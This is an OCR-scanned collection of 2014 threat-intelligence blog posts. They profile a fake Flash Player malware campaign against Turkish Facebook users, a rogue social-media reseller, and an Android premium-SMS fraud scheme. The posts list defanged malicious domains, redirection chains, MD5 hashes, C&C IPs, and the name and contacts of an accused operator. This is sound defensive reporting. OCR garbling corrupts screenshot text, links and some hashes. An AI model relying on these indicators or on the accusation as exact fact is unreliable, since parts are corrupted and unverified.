4K: 20$ 
SK: 25$ 


10K: 50$ 
20K: 100$ 
30K: 150$ 
40K: 200$ 
50K: 250$ 


Facebook Subscriber Prices 


1K: 2$ 

2K: 5$ 

3K: 7$ 

4K: 10$ 
5K: 12$ 
6K: 13$ 
7K: 15$ 
8K: 17$ 
9K: 20$ 
10K: 25$ 


20K: 50$ 
30K: 100$ 
40K: 150$ 
SOK: 200$ 


Facebook Lists Prices 
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Facebook Lists Prices 


1K: 5$ 

2K: 10$ 
3k: 155 
4K: 20$ 
5K: 25$ 
6K: 30$ 
7K: 35$ 
8K: 40$ 
9K: 45$ 
10K: 50$ 


20K: 50$ 
30K: 100$ 
40K: 150$ 
50K: 200$ 


Dealers For Sale ! ProfMedya 
WebSite : www.profmedya.com 


Communication 
Skype: Profonixcod 


MSN: FiberBayimDestek@hotmail.com.tr 


Skype ID of the rogue company: ProFonixcod 


Secondary company name: ProfMedya - hxxp://profmedya.com - 178.33.42.254; 188.138.9.39; 
89.19.20.242 - Email: kayahoca@gmail.com. The same domain, profmedya.com used to re- 


spond to 188.138.9.39. 


Domains known to have responded to the same IP (188.138.9.39) are also the follow- 


ing malicious domains: 


4967 


hxxp://facebooook.biz 
hxxp://worldmedya.net 
fhxxp://astotoliked.net 
hxxp://adsmedya.com 
hxxp://facebookmedya.biz 
hxxp://fastotolike.com 
hxxp://fomedyahizmetleri.com 
hxxp://fiberbayim.com 
hxxp://profonixcoder.com 
hxxp://sansurmedya.biz 
hxxp://sosyalpaket.com 
hxxp://takipciniarttir.net 
hxxp://videomedya.net 
hxxp://videopackage. biz 
hxxp://worldmedya.net 
hxxp://www-facebook.net 
hxxp://www.facebook-java.com 
hxxp://www.facemlike.com 
hxxp://www.fastcekim.com 
hxxp://www.fastotolike.com 
hxxp://www.fomedyahizmetleri.com 
hxxp://www.profmedya.com 


hxxp://www.sansurmedya.com 


Rogue social media distribution platform operator’s name: Fatih Konar 
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Associated emails: fiberbayimdestek@hotmail.com.tr; nerdenezaman@hotmail.com.tr 
Google+ Account: hxxps://plus.google.com/103847 7436831294 39807/about 


Twitter account: hxxps://twitter.com/ProfonixCodtr 


Domain name reconnaissance: 


profonixcod.com (profonix-cod.com) - 216.119.143.194 - Email: abazafamily _@hotmail.com 
(related domains known to have been registered with the same email - warningyoutube.com; 
likebayi.com) 


profonixcod.net 


Updated will be posted as soon as new developments take place. 


1. http://ddanchev. blogspot .com/2014/01/facebook- spreading- amazon. htm 


2. http://www.webroot.com/blog/2014/02/14/doubleclick-malvertising-campaign-exposes-long-run-beneath-radar-m 


alvertising-infrastructure/ 


3. http://www.webroot .com/blog/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass-iframe-embedd 


4. bhttp://www.webroot.com/blog/2012/11/26/cybercriminals-release-stealthy-diy-mass- iframe-injecting-apache- 
5. https: //wuw. virustotal . com/en/file/7£7bd5f002de9aedde4f aSdca5356ci576c95eb58bd85178d0781df cOata6ca4/analys 
6. https: //wuw. virustotal . com/en/file/Taae8£81397608d3c08e3£b645¢4001 2601560. 147 0bfbd0Ved08cde8ceaedc8/analys 


9. http: //www.exposedbotnets.com/2014/01/videotrin-facebook-spreading- browser .htm 


10.2 March 


10.2.1 Summarizing Webroot’s Threat Blog Posts for January (2014-03-06 19:41) 
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Webroot Threat Blog 
Internet Security Threat Updates & Insights 


READ 


Webroot Blogs 


Search for 


| Search 


Please select your language 
from below. Translation 
semices provided by Google 
wile + ma 


Our Extended 
Community 


| fake *] in Boy 


Top Authors 


ww 
@ Dancho Danchev 


a Grayson Milbourne 
A Nathan Collier 
Pe Tyler Moffitt 

re | Brenden Vaughan 


WATCH CONNECT DISCUSS 
: eee ME caierimanes’ | Ge? seemctcae 


Can Security Survive in an Increasingly Insecure 
World? 


February 21st, 2014 by Grayson Milbourne 


2013 was not a good year in terms of cyber security. Despite companies spending an increasingly signifkant percent 


of revenue on security technology — systems designed tc 


Cc act and prevent hackers from gaining access to 
their networks and sensitive dala — attacks conlinue to succeed. Recently, the trend has shified to attacking point of 
sale (POS) systems. While Target ts the largest example, similar attacks have occurred in industries ranging from 


department store 


) hospitals to hotel chains. Basically anywhere large scale financial transactions take place. The 


focus on POS systems doesn't come as a surprise. Cybercriminals have always [...] 


CONTINUE READING » 


Posted in| Deep Knowledge, malware, Mobile, Threat Research 
Tagged cybersecurity deepthreatknowledge RSA RSAConference RSAC security survival 


Spamvertised ‘You received a new message from 
Skype voicemail service’ themed emails lead to 
Angler exploit kit 

February 20th, 2014 by Dancho Danchev 


We've just intercepted a currently circulating malicious spam campaign that’s attempting to trick potential botnet 


victims into thinking that they've received a legitimate Voke Message Notification from Skype. in reality though, once 


socially engineered users click on the malicious link found in the bogus emails, they're automatically exposed to the 


lant cite avninite canst fu the Anmlar ania vit Binre Aaotailc 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for January, 
2014. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [3]‘Adobe License Service Center Order NR’ and ‘Notice to appear in court’ themed 
malicious spam campaigns intercepted in the wild 

02. [4]New “Windows 8 Home Screen’ themed passwords/game keys stealer spotted in the 
wild 

03. [5]Vendor of TDoS products resets market life cycle of well Known 3G USB modem/GSM/SIM 
card-based TDoS tool 

04. [6]New TDoS market segment entrant introduces 96 SIM cards compatible custom GSM 
module, positions itself as market disruptor 

05. [7]DIY Python-based mass insecure WordPress scanning/exploting tool with hundreds of 
pre-defined exploits spotted in the wild 

06. [8]Google’s reCAPTCHA under automatic fire from a newly launched reCAPTCHA- 
solving/breaking service 


4970 


07. [9]Fully automated, APl-supporting service, undermines Facebook and Google’s 
‘SMS/Mobile number activation’ account registration process 

08. [10]Newly launched managed ‘compromised/hacked accounts E-shop hosting as service’ 
standardizes the monetization process 

09. [11]Newly released Web based DDoS/Passwords stealing-capable DIY botnet generating 
tool spotted in the wild 

10. [12]Cybercriminals release new Web based keylogging system, rely on penetration pricing 
to gain market share 


This post has been reproduced from [13]Dancho Danchev’s blog . Follow him 
[14]on Twitter. 


1. http://www.webroot.com/blog 
2. http://feeds2.feedburner.com/WebrootThreatBlog 


3. http://www.webroot .com/blog/2014/01/07/adobe-license-service-center-order-nr-notice-appear-court-themed-m 


alicious-spam-campaigns-intercepted-wild/ 


4. http://www.webroot.com/blog/2014/01/09/new-windows- 8-home-screen-themed-passwordsgame-keys-stealer-spotte 


ttp://www.webroot .com/blog/2014/01/13/vendor-tdos-products-releases-new- gsm3g-usb-modem- based-tdos-tool/ 
ttp://www.webroot.com/blog/2014/01/16/new-tdos-market-segment-entrant-introduces-96-sim-cards-compatible 


custom-gsm-module-positions-market-disruptor/ 


7. bttp://www.webroot.com/blog/2014/01/17/diy-python-based-mass- insecure-wordpress-scanningexploting-tool-h 


dreds-pre-defined-exploits-spotted-wild/ 


8. http://www.webroot.com/blog/2014/01/21/googles-recaptcha-automat ic-fire-newly-launched-recaptcha-solving- 


breaking-service/ 


9. http://www.webroot .com/blog/2014/01/22/fully-automated-api-supporting-service-undermines-facebook-googles 


sms-activation-mobile-number-activation-account-regist 


10. bttp://www.webroot .com/blog/2014/01/24/newly-launched-managed- compromisedhacked-accounts-e-shop-host ing 


service-standardizes-monetization-process/ 


11. bttp://www.webroot .com/blog/2014/01/30/newly-released-web-based-ddospasswords-stealing-capable-diy-bot 
12. http://www. webroot .com/blog/2014/01/31/cybercriminals-release-new-web-based-keylogging-system/ 

13. 

14 
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10.2.2 Summarizing Webroot’s Threat Blog Posts for February (2014-03-06 20:48) 


Webroot Threat Blog 
Internet Security Threat Updates & Insights 


READ ? WATCH Se: CONNECT @) DISCUSS 


Webroot Blogs 


Search for 


Can Security Survive in an Increasingly Insecure 
|. Search. | World? 


February 21st, 2014 by Grayson Milbourne 


Haan it acng' Herb qa 2013 was not a good year in terms of cyber security. Despite companies spending an increasingly significant percent 
semices provided by Google of re 
oe i a = their networks and sensitive data — attacks continue to succeed. Recently, the trend has shified to altacking point of 


While Target is the largest example, similar attacks have occurred in industries ranging from 


nue on security technology - systems designed to thwart, detect and prevent hackers from gaining access to 


0 hospitals to hotel chains. Basically anywhere large scale financial transactions take place. The 


ems doesn't come as a surprise. Cybercriminals have always [ 
CONTINUE READING » 
Our Extended 
Community 


Posted in| Deep Knowledge, malware, Mobile, Threat Research 


cw & (si) Tagged cybersecurity deeptireatknowledge RSA RSAConference RSAC security survival 


Top Authors 


“a 
@ Dancho Danchev 


Spamvertised ‘You received a new message from 
By 6227500 mivourne Skype voicemail service’ themed emails lead to 
Angler exploit kit 


. February 20th, 2014 by Dancho Danchev 
Pe Tyler Moffitt 
We've just intercepted a currently circulating malicious spam campaign that’s attempting to trick potential botnet 


Pe | Brenden Vaughan victims into thanking that they ve récéived a egiimate Vore Message Notification from Skype. in reality tho 
socially engineered users click on the malicious link found in the bogus emails, they're automatically exposed to the 


slant cite avninite const fu the Anwar avnist bit Binre ctotaile 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for February, 
2014. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [3]Cybercriminals release Socks4/Socks5 based Alexa PageRank boosting application 

02. [4]Market leading ‘standardized cybercrime-friendly E-shop’ service brings 2500+ bou- 
tique E-shops online 

03. [5]Managed TeamViewer based anti-forensics capable virtual machines offered as a 
service 

04. [6]Malicious campaign relies on rogue WordPress sites, leads to client-side exploits through 
the Magnitude exploit kit 

05. [7]‘Hacking for hire’ teams occupy multiple underground market segments, monetize 
their malicious ‘know how’ 
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[8]DoubleClick malvertising campaign exposes long-run beneath the radar malvertising 
infrastructure 
07. [9]Spamvertised ‘Image has been sent’ Evernote themed campaign serves client-side 
exploits 
08. [10]Spamvertised ‘You received a new message from Skype voicemail service’ themed 
emails lead to Angler exploit kit 


This post has been reproduced from [11]Dancho Danchev’s blog . Follow him 
[12]Jon Twitter. 


1. http://www.webroot.com/blog 
2. http://feeds2.feedburner.com/WebrootThreatBlog 
3 


ttp://www.webroot.com/blog/2014/02/04/cybercriminals-release-socks4socks5- based-alexa-pagerank- boost ing- 


ai vee e 


ttp://www.webroot.com/blog/2014/02/07/market- leading- standardized-cybercrime-friendly-e-shop-service-bri 


=a 2500-boutique-e-shops-online/ 


ttp://www.webroot.com/blog/2014/02/10/managed-teamviewer-based-anti-forensics-capable-virtual-machines- 


ffered-service/ 


ttp://www.webroot .com/blog/2014/02/12/rogue-wordpress-sites-lead-to-client-side-exploits/ 


ttp://www.webroot.com/blog/2014/02/13/hacking-hire-teams-occupy-multiple-underground-market- segments-mo: 


etize-malicious-know/ 


ttp://www.webroot.com/blog/2014/02/14/doubleclick-malvertising-campaign-exposes-long-run-beneath-radar-m 


oe infrastructure/ 


ad //waw.webroot.com/blog/2014/02/18/spamvertised-image-sent-evernote-themed-campaign-serves-client-sid 


: ee //www webroot. con/bheg/2014/02/20/spemvertised- received-new-message-skype-voicemail-service-themed 
1 
12. 


10.2.3. Win32.Nixofro Serving, Malicious Infrastructure, Exposes Fraudulent Face- 
book Social Media Service Provider (2014-03-22 08:18) 


I’ve recently spotted a malicious, cybercrime-friendly SWF iframe/redirector injecting service, 
that also exposes a long-run Win32.Nixofro serving malicious infrastructure, currently utilized 
for the purpose of operating a rogue social media service provider, that’s targeting Turkish 
Facebook users through the ubiquitous social engineering vector, for such type of campaigns, 
namely, the fake Adobe Flash player. 


Let’s profile the service, discuss its relevance in the broader context of the threat land- 
scape, provide actionable/historical threat intelligene on the malicious infrastructure, the 
rogue domains involved in it, the malicious MD5s served by the cybercriminals behind it, 
and directly link it to a [1]previously profiled Facebook spreading P2P-Worm.Win32.Palevo 
serving campaign. 
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The managed SWF iframe/redirector service, is a great example of a cybercrime-as-a- 
service type of underground market proposition, empowering, both, sophisticated and novice 
cybercriminals with the necessary ([2]malvertising) ‘know-how’, in an efficient manner, di- 


rectly intersecting with the commercial availability of [3]sophisticated mass Web site/[4]Web 
server malicious script embedding platforms. 


Suan sitedeki 985 kisi toplam 3,457 video'nun keyfini qikariyor.. Sizde onlardan birisi olun! 


kayat_ol 
os 


# Recep ivedik 4 ( Full izle - HD Ucretsiz ) 


Please install Flash Player... 
1 giin dnce eklendi 

15,547 kez izlendi 

Paylas: 

Video 


Hizh Menii 
bt 


S85 
.iletisim 


¢ Sosyal Aglar 

¢ Facebook Sayfamuz 

© Twitter’dan Takip Edin! 
¢ Videolara Abone Olun! 
. lletisime Gecin! 


¢ . kategoriler 


The managed SWF _ iframe/redirector injecting service is currently responding to 
108.162.197.62 and 108.162.196.62 Known to have responded to the same IPs 
(108.162.197.62; 108.162.196.62) is also a key part of the malicious infrastructure that 
I’ll expose in this post, namely hizliservis.pw - Email: furkan@cod.com. 
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Known to have phoned back to the same IP (108.162.197.62) are also the following 
malicious MD5s: 


MD5 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


: 432efe0fa88d2a9e191cb95fa88e7b36 


720ecb1cf4f28663f4ab25eedf620341 


02691863e9dfb9e69b68f5fca932e729 


69ed70a82cb35a454c60c501025415aa 


cc586a176668ceef14891b15e1b412ab 


74291941bddcec131c8c6d531fcb1886 


7c27d9ff25fc40119480e4fe2c7ca987 


72c030db7163a7a7bf2871a449d4ea3c 


432efe0fa88d2a9e191cb95fa88e7b36 


Known to have phoned to the same IP (108.162.196.62) are also the following malicious MD5s: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


eda3f015204e9565c779e0725915864f 


effcfe91lbeaf7a3ed2f4ac79525c5fc5 


14acd831691173ced830f4b51a93elca 


7f93b0c611f7020d28f7a545847b51e0 


bcfce3a9bf2c87dab806623154d49f10 


289c4f925fdec861c7f765a65b7270af 


4c90a89396d4109d8e4e2491c5da4846 


4975 


Sample redirection chain leading to the fake Adobe Flash Player: 
hxxp.//hizliservis.ow/unlu.htm -> hxxp://hizliservis.ow/indir.php -> hxxp://unluvideolari.info 


-> hxxp://videotr.in/player.swf -> hxxp://izleyelim.s3.amazonaws.com/movie.mp4 
&skin=newtubedark/NewTubeDark.xml &streamer=lighttpd &image=hqdefault.jpg 


Domain name reconnaissance: 
hizliservis.pw - Email: furkan@cod.com 
videotr.in - Email: tiiknet@yandex.com; snack@log-z.com 


izleyelim.s3.amazonaws.com - 176.32.97.249 


Within hizliservis.pw, we can easily spot yet another part of the same malicious/fraudulent 
infrastructure, namely, the rogue social media distribution platform’s login interface. 
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K Enter your credentials to login 


Sample redirection chain leading to a currently active fake Adobe Flash Player 
(Win32.Nixofro): 


hxxp://socialmediasystem.net/down.php = -> hxxps://profonixback31.googlecode.com/sv- 
n/FlashPlayer Guncelle.exe 
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¥ vt https://buexe-x.googlecode.com/svn/FlashPlayer%20Setup.exe 
http:/igoo.g r2EP Created: 2014 Feb 22 4 


ago] 
*. 
Ars 


* 
Total Clicks f& 
35,648 Clicks for the past: two hours | day | week | month | all time 


sen 


Os.Fusy il 
Wternet Ex 
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338% DP) 7.000 15,000 22,509 30.000 
Countries Platforms 
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4978 


Detection rate for the fake Adobe Flash Player: 


[5]MD5: 28c3c503d398914bdd2c2b3fdclf9ea4 - detected by 36 out of 50 antivirus scan- 
ners as Win32.Nixofro 


Once executed, the sample phones back to profonixuser.net (141.101.117.218) 


Known to have responded to the same IP (141.101.117.218) are also the following ma- 
licious MD5s: 


MD5: 53360155012d8e5c648aca277cbde587 
MD5: a66alc42cc6fb775254cf32c8db7ad5b 
MD5: a051fd83fc8577b00d8d925581afla3b 
MD5: f47784817a8a04284af4b602c7719cb7 
MD5: 2e5c75318275844ce0ff7028908e8fb4 


MD5: 90205a9740df5825ce80229cal05b9e8 


Domain name reconnaissance for the rogue social media distibution platform: 


socialmediasystem.Net (141.101.118.159; 141.101.118.158) - Email: furkan@cod.com 


Sample redirection chain for the rogue social media distribution platform’s core func- 
tions: 


hxxp://profonixuser.net/new. php?nocache=1044379803 -> hxxp://sosyalmedyakusu.com/oauth. php 
(108.162.199.203; 108.162.198.203) Email: furkan@cod.com -> 
hxxp://hizliservis.pw/face. php -> hxxp.://socialhaberler.com/manyak.php -> 
hxxp://profonixuser.net/new.php -> hxxp://profonixuser.net/amk.php (141.101.117.218) -> 
hxxp://me.cf/dhtcw (31.170.164.67) -> hxxps://video-players.herokuapp.com/?55517841177 
(107.20.187.159) -> hxxp://kingprofonix.net/hxxp://kingprofo nix.com (108.162.198.203) the 
same domain is also known to have responded to 108.162.197.62 
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S+% p 


History — (26) & 12m 


Eapac hua maces 


} Data; 


Related MD5s known to have phoned back to the same IP (108.162.198.203) in the 
past: 


[6]MD5: 505f615f9elc4fdc03964b36ec877d57 


Sample internal redirectors structure: 


hxxp.://profonixuser.net/fb.php -> hxxp://profonixuser.net/manyak.php -> 
hxxp://molotofcu.com/google/hede.php (199.27.134.199) -> hxxp://profonixuser.net/pp.php -> 
hxxp://gdriv.es/awalbbmprtbpahpolcdt?jgxebgqjl -> hxxps://googledrive.com/host/OBO8vFK4UtN- 
5kdjV2NkKIHVTVjcTQ -> hxxp://sosyalmedyakusu.com/s3x.php?ref=google 


hxxp://profonixuser.net/user.php -> hxxp://goo.gl/ber2EP -> hxxps://buexe- 


x.googlecode.com/svn/FlashPlayer %20Setup.exe -> [7]MD5: 60137c1cb77bed9afcbbbc3ad910df3f 
-> phones back to wjetphp.com (46.105.56.61) 


Secondary sample internal redirectors structure: 


hxxp://profonixuser.net/yarak. txt -> hxxp://profonixuser.net/u.exe - 
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> hxxp://profonixuser.net/yeni. txt -> hxxp://profonixuser.net/yeni.exe - 
> hxxp://profonixuser.net/recep.html -> hxxp://goo.gl/ber2EP -> 
hxxp://wjetphp.com/unlu/player.swf -> hxxp://profonixuser.net/kral.txt -> 
hxxp://likef.in/fate.exe - 108.162.194.123; 108.162.195.123; 108.162.199.107 - known 
to have phoned back to the same IP is also the following malicious [8]MD5:  ef- 
fcfe9 lbeaf7a3ed2f4ac79525c5fc5 - detected by 35 out of 50 antivirus scanners as Trojan- 
Ransom.Win32.Foreign.kcme 


S+m i 


History — (0) 12m 


| Data; 


Once executed, the sample phones back to likef.biz (176.53.119.195). The same domain is 
also known to have responded to the following IPs 141.101.116.165; 141.101.117.165. 


Here’s comes the interesting part. The fine folks at [9]ExposedBotnets, have already in- 
tercepted a malicious Facebook spreading campaign, that’s using the already profiled in this 
post videotr.in. 


4981 


Having directly connected the cybercrime-friendly SWF iframe/redirector injecting ser- 
vice, with hizliservis.pw as well as the SocialMediaSystem as being part of the same malicious 
infrastructure, it’s time to profile the fraudulent/malicious adversaries behind the campaigns. 
The cybercriminals behind these campaigns, appear to be operating a rogue social media 
service, targeting Facebook Inc. 


Sample screenshots of the social media distribution platform’s Web based interface: 


€ 2 C OS proinetyaco J - 


{> Fiber Bayt mOerteh@hctma! com tr 
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ee — Se ee | aw) = 


Suanda Yapilan istemler 


Liste Gekimi Artik AKTIF ! 


@) 


Odeme Kanallan 


Miceli 


Sample advertisement of the rogue social media distribution platform: 
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Facebook Page Member Shooting ! 


1K: 5$ 
2K: 10$ 
3K: 15$ 
4K: 20$ 
SK: 25$ 


10K: 50$ 
20K: 100$ 
30K: 150$ 
40K: 200$ 
50K: 250$ 


Facebook Subscriber Prices 


1K: 2$ 

2K: 5$ 

3K: 7$ 

4K: 10$ 
5K: 12$ 
6K: 13$ 
7K: 15$ 
8K: 17$ 
9K: 20$ 
10K: 25$ 


20K: 50$ 
30K: 100$ 
40K: 150$ 
SOK: 200$ 


Facebook Lists Prices 
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Facebook Lists Prices 


1K: 5$ 

2K: 10$ 
3k: 155 
4K: 20$ 
5K: 25$ 
6K: 30$ 
7K: 35$ 
8K: 40$ 
9K: 45$ 
10K: 50$ 


20K: 50$ 
30K: 100$ 
40K: 150$ 
50K: 200$ 


Dealers For Sale ! ProfMedya 
WebSite : www.profmedya.com 


Communication 
Skype: Profonixcod 


MSN: FiberBayimDestek@hotmail.com.tr 


Skype ID of the rogue company: ProFonixcod 


Secondary company name: ProfMedya - hxxp://profmedya.com - 178.33.42.254; 188.138.9.39; 
89.19.20.242 - Email: kayahoca@gmail.com. The same domain, profmedya.com used to re- 


spond to 188.138.9.39. 


Domains known to have responded to the same IP (188.138.9.39) are also the follow- 


ing malicious domains: 
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hxxp://facebooook.biz 
hxxp://worldmedya.net 
fhxxp://astotoliked.net 
hxxp://adsmedya.com 
hxxp://facebookmedya.biz 
hxxp://fastotolike.com 
hxxp://fomedyahizmetleri.com 
hxxp://fiberbayim.com 
hxxp://profonixcoder.com 
hxxp://sansurmedya.biz 
hxxp://sosyalpaket.com 
hxxp://takipciniarttir.net 
hxxp://videomedya.net 
hxxp://videopackage. biz 
hxxp://worldmedya.net 
hxxp://www-facebook.net 
hxxp://www.facebook-java.com 
hxxp://www.facemlike.com 
hxxp://www.fastcekim.com 
hxxp://www.fastotolike.com 
hxxp://www.fomedyahizmetleri.com 
hxxp://www.profmedya.com 


hxxp://www.sansurmedya.com 


Rogue social media distribution platform operator’s name: Fatih Konar 
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Associated emails: fiberbayimdestek@hotmail.com.tr; nerdenezaman@hotmail.com.tr 
Google+ Account: hxxps://plus.google.com/103847 7436831294 39807/about 


Twitter account: hxxps://twitter.com/ProfonixCodtr 


Domain name reconnaissance: 


profonixcod.com (profonix-cod.com) - 216.119.143.194 - Email: abazafamily _@hotmail.com 
(related domains known to have been registered with the same email - warningyoutube.com; 
likebayi.com) 


profonixcod.net 


Updated will be posted as soon as new developments take place. 


1. http://ddanchev. blogspot .com/2014/01/facebook- spreading-amazon.htm 


2. http://www.webroot.com/blog/2014/02/14/doubleclick-malvertising- campaign-exposes-long-run-beneath-radar- 


alvertising-infrastructure/ 


3. http://www.webroot .com/blog/2013/06/03/compromised-ftpssh-account-privilege-escalating-mass-iframe-embedd 


4. bttp://www.webroot.com/blog/2012/11/26/cybercriminals-release-stealthy-diy-mass-iframe-injecting-apache-2 
5. https: //wuw. virustotal . com/en/file/7£7bd5£002de9aedde4f aSdca5356ci576c95eb58bd85178d0781df cOataéca4/analys 
6. https: //wuw. virustotal . com/en/file/Taae8i81397608d3c08e3£b645¢40012601560¢ 147 bf bd0Ved08cde8ceaedc8/analys 


8. https://www.virustotal .com/en/file/a50411aa3850eldefcce38£079daf 175a9ca7£b32749c9b4394ef6236476d094/analys 
is/ 
9. http: //www.exposedbotnets.com/2014/01/videotrin-facebook-spreading-browser . htm 


10.3 October 


10.3.1 Rogue Android Apps Hosting Web Site Exposes Malicious Infrastructure 
(2014-10-21 21:24) 
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With cybercriminals continuing to populate the cybercrime ecosystem with automatically 
generated and monetized mobile malware variants, we continue to observe a logical shift 
towards convergence of [1]cybercrime-friendly revenue sharing affiliate networks, and 
[2]malicious infrastructure providers, on their way to further achieve a posive ROI (return on 
investment) out of their [3]risk-forwarding fraudulent activities. 


I’ve recently spotted a legitimately looking, [4]rogue Android apps hosting Web site, directly 
connected to a market leading [5]DIY API-enabled mobile malware generating/monetizing 
platform, further exposing related [6]fraudulent operations, performed, while utilizing the 
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[7 ]malicious infrastructure, which I'll expose in this post. 


Let’s assess the campaign, expose the malicious infrastructure behind it, list the cybercrime- 
friendly premium rate SMS numbers, involved in it, as well as related malicious MD5s, known 
to have participated in the campaign/have utilized the same malicious infrastructure. 


Sample rogue Android apps hosting URL: hxxp://androidapps.mob.wf - 37.1.206.173 


Responding to the same IP (37.1.206.173) are also the following fraudulent domains: 
hxxp://22-minuty.ru 

hxxp://nygolfpro.com 

hxxp://bloomster.dp.ua 

hxxp://stdstudio.com.ua 


hxxp://autosolnce.ru 


Detection rate for sample rogue Android apps: 
[8]MD5: 4bf349b601fd73c74eafcOlce8ea8be7 
[9]JMD5: c4508c127029571e5b6f6b08e5c91415 


[LOJMD5: bd296d35bf41b9ae73ed816cc7c4c38b 


Sample redirection chain exposing the fraudulent infrastructure: hxxp://22-minuty.ru -> 
hxxp://playersharks2.com/player.php/?userid= - 94.242.214.133; 94.242.214.155 


Known to have responded to the same IPs (94.242.214.133; 94.242.214.155) are also 
the following fraudulent domains, participating in a related revenue-sharing affiliate net- 
work based type of monetization scheme: 
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hxxp://4books.ru 
hxxp://annoncer.media-bar.ru 
hxxp://booksbuttonl.com 
hxxp://film-club.ru 
hxxp.//film-popcorn.ru 
hxxp://filmbuttons.ru 
hxxp://filmi-doma.com 
hxxp://filmonika.ru 
hxxp://films.909.su 
hxxp://indiiskie. ru 
hxxp://kinozond.ru 
hxxp://media-bar.ru 
hxxp://playersharks2.com 
hxxp://playersharks4.com 
hxxp://pplayer.ru 
hxxp://sharksplayer2.com 
hxxp://sharksplayer3.ru 
hxxp://sharksreader.ru 
hxxp://tema-info.ru 
hxxp://toppfilms.ru 
hxxp://video-movies.com 
hxxp://video.909.su 
hxxp://videodomm.ru 
hxxp://videozzy.com 
hxxp://videozzzz.ru 
hxxp://websharks.ru 
hxxp://yasmotrju.ru 
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Malicious MD5s known to have phoned back to the same IP (94.242.214.133): 


MD5 


MD5: 


MD5: 


MD5: 


MD5: 


: JecB8aef6dc0e3db8596ac54318847328 


895c38ec4fblfbee4 7bfb3b6ee3a170b 


c4d88b32b605500b7f86de5569al11e22 


49861fd4748dd57c192139e8bd5b71e3 


8b350f8a32ef4b28267995cf8f0Oceael 
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Premium rate SMS numbers involved in the fraudulent scheme: 
7151; 9151; 2855; 3855; 3858; 2858; 8151; 7155; 7255; 3190; 3200; 3170; 3006; 3150; 
6150; 4124; 4481; 7781; 5014; 1151; 4125; 1141; 1131; 1350; 3354; 7122; 3353; 7132; 


3352; 8355; 8155; 8055; 7515; 1037; 1953; 3968; 5370; 1952; 3652; 5373; 9191; 1005; 
7019; 7250; 1951; 7015; 7099; 7030 


> 2] ——————— 
eee ern ee Tapers 


Crpana: 
— Poccua v 
Homep: Bunaity 0.00 py6. 0.00 py6. 
8619 8605 8621 
8601 8606 2151 , | | 
4440 4443 ij. 4444 —— 
3151 8607 8608 
6151 4445 8609 
7151 4169 + °# #44 6 
4448 8610 8151 
7495 4449 8611 
9151 9990 7496 
2858 8612 3855S 
255 3858 2855 
155 7497 
3858 8613 38 
7498 8614 
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Once executed MD5: 9ec8aef6dc0e3db8596ac54318847328 phones back to the follow- 
ing C &C servers, further exposing the malicious infrastructure: 


67.215.246.10:6881 
82.221.103.244:6881 
114.252.58.66:6407 
89.136.77.86:45060 
212.25.54.183:32822 
107.191.223.72:22127 
87.89.149.106:24874 
82.247.154.128:47988 
108.181.68.73:47342 
82.74.179.126:52352 
121.222.168.146:64043 
217.121.30.46:34421 
115.143.245.78:51548 
110.15.205.16:51477 
37.114.69.97:19079 
85.229.206.243:55955 
95.109.112.178:60018 
95.68.195.182:44025 
239.192.152.143:6771 
109.187.54.101:13100 
117.194.5.97:55535 
95.29.112.178:59039 


109.162.133.97:19459 
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83.205.112.178:11420 


95.68.3.182:53450 


175.115.103.140:52696 


197.2.133.97:27334 


84.55.8.7:10060 


27.5.132.243:19962 


123.109.176.178:36527 


175.157.176.178:22906 


188.187.147.247:14745 


178.212.133.205:52416 


145.255.1.250:41973 


213.21.32.190:51413 


93.73.165.31:61889 


176.97.214.119:46605 


185.51.127.134:16447 


109.239.42.123:16845 


77.232.158.215:40266 


178.173.37.2:47126 


62.84.24.219:47594 


37.144.87.15:13448 


5.251.28.179:39620 


94.19.66.51:42894 


94.51.242.89:35691 


93.179.102.216:24458 


212.106.62.201:44821 
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95.52.69.39:12249 


46.118.64.45:44172 


217.175.33.130:45244 


185.8.126.226:32972 


93.92.200.202:56664 


94.214.220.37:35196 


46.182.132.67:32103 


46.188.123.131:11510 


83.139.188.142:34549 


188.232.124.16:27582 


91.213.23.226:19751 


95.32.142.28:55555 


95.83.188.157:15714 


95.128.244.10:59239 


176.31.240.170:6882 


79.109.88.241:6881 


91.215.90.109:34600 


62.198.229.165:6881 


91.148.118.250:21558 


81.82.210.40:6881 


97.121.23.163:31801 


78.186.155.62:6881 


78.1.158.105:47475 


79.160.62.185:9005 


213.87.123.81:17790 
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178.150.154.26:26816 


83.174.247.71:59908 


109.87.175.144:29374 


86.57.186.171:45013 


193.222.140.60:35691 


176.115.158.138:24253 


42.98.191.90:7085 


178.127.152.72:10107 


82.239.74.201:61137 


185.19.22.192:46337 


86.185.92.38:10819 


78.214.194.145:24521 


37.78.85.173:49001 


82.70.112.150:32371 


37.131.212.35:18525 


79.136.156.151:59659 


2.134.48.150:12530 


95.29.164.86:6881 


37.147.16.242:64954 


79.45.36.86:22690 


112.208.182.65:56374 


62.99.29.74:44822 


95.16.12.111:12765 


124.169.69.69:41216 


5.164.83.49:62348 
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79.22.73.216:61914 


46.63.131.146:6881 


89.150.119.203:55029 


58.23.49.24:2717 


83.41.5.241:45624 


87.21.80.23:27949 


178.150.176.150:57997 


178.127.195.146:58278 


5.141.236.13:15784 


125.182.35.138:54094 


99.228.23.82:29302 


14.111.131.146:33433 


122.177.90.137:25375 


178.223.195.146:54596 


182.54.112.150:1058 


109.23.145.152:31514 


213.241.204.31:27769 


188.168.58.6:45823 


2.94.4.215:50830 


42.91.39.236:13923 


116.33.113.4:19973 


86.182.170.27:25712 


177.82.206.231:39043 


122.143.152.35:7890 


217.13.219.147:39190 
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77.75.13.195:16279 


87.239.5.144:58749 


89.141.116.97:49001 


176.106.11.49:44690 


112.14.110.199:33243 


122.26.6.52:20527 


178.223.195.146:23034 


98.118.85.85:51413 


190.63.131.146:6881 


46.151.242.82:16046 


176.106.19.185:46114 


85.113.157.12:62633 


192.168.0.105:58749 


211.89.227.34:56333 


36.68.16.149:42839 


31.15.80.10:42061 


130.15.95.112:6881 


87.119.245.51:6882 


109.173.101.19:19700 


193.93.187.234:1214 


176.106.18.254:43469 


176.183.137.53:19155 


176.113.168.51:52672 


93.123.60.130:52981 


